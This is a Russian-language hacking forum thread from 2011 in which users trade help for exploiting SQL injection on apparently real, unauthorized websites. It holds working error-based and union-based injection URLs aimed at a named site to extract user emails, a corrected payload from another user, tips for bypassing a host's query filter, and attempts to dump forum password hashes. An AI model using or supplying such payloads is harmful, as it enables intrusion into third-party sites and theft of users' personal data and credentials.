Ваши вопросы по уязвимостям.

Expl0ited · 11 Jan 2011

cheater_man said:
Глупый вопрос:
если я делаю запрос
Code:
www.xxx.ru/auth.php?id=1'
ничего не происходит, открывает ту же самою страницу,
То есть ' фильтруется?
Click to expand...
действительно глупый вопрос. Вопрос очень странно поставлен, я затрудняюсь на него ответить.

noviyuser · 11 Jan 2011

Подскажите мужики как обойти фильтрацию FROM в sql injection
Хостинг на SpaceWeb

Drakula208 · 11 Jan 2011

вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?

h00lyshit! · 11 Jan 2011

noviyuser said:

Подскажите мужики как обойти фильтрацию FROM в sql injection
Хостинг на SpaceWeb
Click to expand...

Насколько я помню, там фильтруется последовательность union select from, обходится POST'ом, если скрипт его принимает, либо подзапросы.

Gorev · 11 Jan 2011

Drakula208 said:

вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?
Click to expand...

попроси админа что бы дал тебе доступ по ssh..и тогда заходи..из пхпинфо слово инфо тебе о чем нибудь говорит? информация тебе поможет если ты нашел скуль и имеешь файл_прив ..либо инклюд..

durito · 12 Jan 2011

вот такая проблема:
http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28select+count%280%20%29,concat%28%28select%20count%28*%29%20from%20user%29,floor%28rand%280%29*2%29%29+from%20+information_schema.tables+group+by+2+limit+1%29a%29

выдает количество юзеров в таблице user

Message: Can't execute query: Duplicate entry '17661' for key 1

но вот при выводе полей пишет ошибку:

http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28select+count%280%20%29,concat%28%28select%20mail%20from%20user+limit+1,1%29,floor%28rand%280%29*2%29%29+from%20+information_schema.tables+group+by+2+limit+1%29a%29

Message: Can't execute query: Unknown column 'table_name' in 'field list'

в чем может быть проблема?

Seravin · 12 Jan 2011

Code:

http://www.uk121.com/events_view.php?eid=(select*from+(select+name_const((select+mail+from+user+limit+1),1),name_const((select+mail+from+user+limit+1),1))a)

durito · 12 Jan 2011

Seravin said:
Code:
http://www.uk121.com/events_view.php?eid=(select*from+select+name_const((select+mail+from+user+limit+1),1),name_const((select+mail+from+user+limit+1),1))a)
Click to expand...
так все равно вывода нет

Seravin · 12 Jan 2011

скобку пропустил. исправил

durito · 12 Jan 2011

Seravin, спасибо большое

noviyuser · 12 Jan 2011

http://xxxx.net/1'/
Click to expand...

поставил кавычку
вылезло

SQL Error (1064): You have an error i*n your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''302'' ORDER BY pid' at line 1 i*n query "SELECT dir, title as title, id, pid, hiddenLink, cod FROM catalogue WHERE dir='1'' ORDER BY pid" in xxx/xxx/xxx.php on line 1
Click to expand...

получается

http://xxxx.net/?id=1 равно http://xxxx.net/1/
Click to expand...

правильно ли я составил?

Seravin · 12 Jan 2011

что ты составил? ты просто сделал то что делает .htaccess

noviyuser · 12 Jan 2011

Seravin said:

что ты составил? ты просто сделал то что делает .htaccess
Click to expand...

http://xxxx.net/?id=1 при этом запросе не отображает ту страницу которая была при http://xxxx.net/1/
в этом смысле имел ввиду

Seravin · 12 Jan 2011

логично что не правильно?

noviyuser · 12 Jan 2011

Seravin said:

логично что не правильно?
Click to expand...

какой запрос составить чтобы отображало ту же страницу как и при http://xxxx.net/1/

http://xxxx.net/index.php?dir=1
или
http://xxxx.net/?pid=1

Seravin · 12 Jan 2011

1) а нам то как узнать?
2) а зачем ты это делаешь? ты скулю расскрутить не можешь при http://xxxx.net/1/ ?

noviyuser · 12 Jan 2011

Seravin said:

1) а нам то как узнать?
2) а зачем ты это делаешь? ты скулю расскрутить не можешь при http://xxxx.net/1/ ?
Click to expand...

точно не знаю как делать при таком виде, можешь подсказать примерчик

Seravin · 12 Jan 2011

а чем он отличается от обычной скули?
http://xxxx.net/1+and+1=2+union+select+1,2,3,4,5,6+--+/

Gorev · 12 Jan 2011

мда уж, для тех кто в танке id=1 равно с /1/ , id=1+union+select+bla bla bla,...../1+union+select+bla bla bla

noviyuser · 12 Jan 2011

mysql 5 версия

-1+union+Select+1,2,3,4,5,6,7+from+table1.ibf_members+--+
Click to expand...

выводимые поля 2 и 3

не выводит

-1+union+Select+1,password,3,4,5,6,7+from+table1.ibf_members+--+
Click to expand...

не выводит

-1+union+Select+1,unhex(hex(password)),3,4,5,6,7+from+table1.ibf_members+--+
Click to expand...

-1+union+Select+1,aes_decrypt(aes_encrypt(password)),3,4,5,6,7+from+table1.ibf_members+--+
Click to expand...

тоже не выводит

group_concat, concat пробовал
из другой любой кроме ibf_members выводит данные, как обойти?

Ваши вопросы по уязвимостям.

Expl0ited Members of Antichat

noviyuser Member

Drakula208 New Member

h00lyshit! [From Nobody To Root]

Gorev Level 8

durito Elder - Старейшина

Seravin Active Member

durito Elder - Старейшина

Seravin Active Member

durito Elder - Старейшина

noviyuser Member

Seravin Active Member

noviyuser Member

Seravin Active Member

noviyuser Member

Seravin Active Member

noviyuser Member

Seravin Active Member

Gorev Level 8

noviyuser Member

Useful Searches

Ваши вопросы по уязвимостям.

Expl0ited Members of Antichat

noviyuser Member

Drakula208 New Member

h00lyshit! [From Nobody To Root]

Gorev Level 8

durito Elder - Старейшина

Seravin Active Member

durito Elder - Старейшина

Seravin Active Member

durito Elder - Старейшина

noviyuser Member

Seravin Active Member

noviyuser Member

Seravin Active Member

noviyuser Member

Seravin Active Member

noviyuser Member

Seravin Active Member

Gorev Level 8

noviyuser Member